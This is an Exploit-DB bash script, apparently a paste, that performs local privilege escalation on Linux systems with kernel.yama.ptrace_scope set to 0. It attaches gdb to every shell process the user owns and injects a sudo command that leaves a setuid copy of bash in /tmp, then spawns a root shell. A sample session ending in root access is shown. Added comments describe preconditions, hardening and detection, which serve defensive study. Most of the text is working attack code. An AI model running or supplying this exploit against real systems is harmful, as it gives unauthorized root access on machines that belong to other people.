
EDB-ID-46989.sh

TVT618 Jun 17th, 2019 358 Never
#!/usr/bin/env bash

#######################################################
#                                                     #
#           'ptrace_scope' misconfiguration           #
#              Local Privilege Escalation             #
#                                                     #
#######################################################

# Affected operating systems (TESTED):
#   Parrot Home/Workstation    4.6 (Latest Version)
#   Parrot Security            4.6 (Latest Version)
#   CentOS / RedHat            7.6 (Latest Version)
#   Kali Linux              2018.4 (Latest Version)

# Authors: Marcelo Vazquez  (s4vitar)
#          Victor Lasa      (vowkin)

#┌─[s4vitar@parrot]─[~/Desktop/Exploit/Privesc]
#└──╼ $./exploit.sh
#
#[*] Checking if 'ptrace_scope' is set to 0... [√]
#[*] Checking if 'GDB' is installed...         [√]
#[*] System seems vulnerable!                  [√]
#
#[*] Starting attack...
#[*] PID -> sh
#[*] Path 824: /home/s4vitar
#[*] PID -> bash
#[*] Path 832: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> bash
#[*] Path 1816: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> bash
#[*] Path 1842: /home/s4vitar
#[*] PID -> bash
#[*] Path 1852: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> bash
#[*] Path 1857: /home/s4vitar/Desktop/Exploit/Privesc
#
#[*] Cleaning up...                            [√]
#[*] Spawning root shell...                    [√]
#
#bash-4.4# whoami
#root
#bash-4.4# id
#uid=1000(s4vitar) gid=1000(s4vitar) euid=0(root) egid=0(root) grupos=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(debian-tor),124(bluetooth),136(scanner),1000(s4vitar)
#bash-4.4#

#######################################
# startAttack: for every shell process owned by the current user, attach gdb
# and make that process run a sudo command; the attempt counts as successful
# only if a setuid copy of bash ends up at /tmp/bash.
#
# Preconditions this depends on (what a defender should look at):
#   - kernel.yama.ptrace_scope = 0, which lets a process attach to any other
#     process running under the same uid.
#   - `echo | sudo -S` feeds sudo an empty password, so the injected command
#     can only succeed where sudo asks for none. Presumably that means a
#     still-valid cached sudo timestamp in the targeted shell's session, or a
#     NOPASSWD rule; confirm against the host's sudoers policy.
#   - gdb installed and /tmp allowing setuid binaries.
#
# Hardening: set kernel.yama.ptrace_scope to 1 or higher, shorten or disable
# sudo credential caching (`Defaults timestamp_timeout=0`), mount /tmp with
# nosuid, and keep debuggers off hosts that do not need them.
#
# Detection: ptrace attaches from an interactive user (e.g. via auditd),
# gdb started with -p against a shell, sudo log entries copying /bin/bash,
# and setuid files appearing under /tmp.
#
# Globals:   none
# Arguments: none
# Outputs:   progress lines on stdout; gdb output is discarded
#######################################
function startAttack(){
  # Hide the cursor, then list candidate PIDs: pgrep matches process names
  # against an alternation built from the last path component of each
  # /etc/shells entry, limited to the caller's uid. `sed '$ d'` drops the last
  # PID of that list (reason not stated on the page; possibly to skip this
  # script's own shell, unverified).
  tput civis && pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d' | while read shell_pid; do
    # Informational only: print the process name and working directory when
    # they can be read. NOTE(review): the expansions inside `[ ]` are unquoted.
    if [ $(cat /proc/$shell_pid/comm 2>/dev/null) ] || [ $(pwdx $shell_pid 2>/dev/null) ]; then
      echo "[*] PID -> "$(cat "/proc/$shell_pid/comm" 2>/dev/null)
      echo "[*] Path $(pwdx $shell_pid 2>/dev/null)"
    # The gdb step after `fi;` runs for every PID, whether or not anything was
    # printed: gdb attaches to the process (-p) and the piped `call system(...)`
    # makes the target process itself run the two sudo commands. All gdb output
    # and errors are discarded.
    fi; echo 'call system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")' | gdb -q -n -p "$shell_pid" >/dev/null 2>&1
    done

    # The presence of /tmp/bash is taken as proof that an injected sudo command
    # ran; owner and mode are not checked, so a pre-existing file also passes.
    # `bash -p` keeps the effective uid granted by the setuid bit. The inner
    # script deletes the copy, restores the cursor and starts a bash that keeps
    # that effective uid.
    if [ -f /tmp/bash ]; then
      /tmp/bash -p -c 'echo -ne "\n[*] Cleaning up..."
                      rm /tmp/bash
                      echo -e "                            [√]"
                      echo -ne "[*] Spawning root shell..."
                      echo -e "                    [√]\n"
                      tput cnorm && bash -p'
    else
      echo -e "\n[*] Could not copy SUID to /tmp/bash          [✗]"
    fi
}
# Pre-flight: continue only when both preconditions hold.
#   1. /proc/sys/kernel/yama/ptrace_scope contains "0". Valid values are 0-3,
#      so the substring match only hits the permissive setting. Hosts hardened
#      with kernel.yama.ptrace_scope >= 1 stop here.
#   2. gdb is on PATH.
# The same two checks work as a quick audit of whether a host is exposed.
echo -ne "[*] Checking if 'ptrace_scope' is set to 0..."
if ! grep -q "0" < /proc/sys/kernel/yama/ptrace_scope; then
  # Restricted ptrace, or the Yama sysctl is not readable.
  echo " [✗]"
  echo "[*] System is NOT vulnerable :(               [✗]"
else
  echo " [√]"
  echo -ne "[*] Checking if 'GDB' is installed..."
  if ! command -v gdb >/dev/null 2>&1; then
    # No debugger available to attach with.
    echo "         [✗]"
    echo "[*] System is NOT vulnerable :(               [✗]"
  else
    echo -e "         [√]"
    echo -e "[*] System seems vulnerable!                  [√]\n"
    echo -e "[*] Starting attack..."

    startAttack
  fi
fi

# Always make the cursor visible again, whichever branch ran.
tput cnorm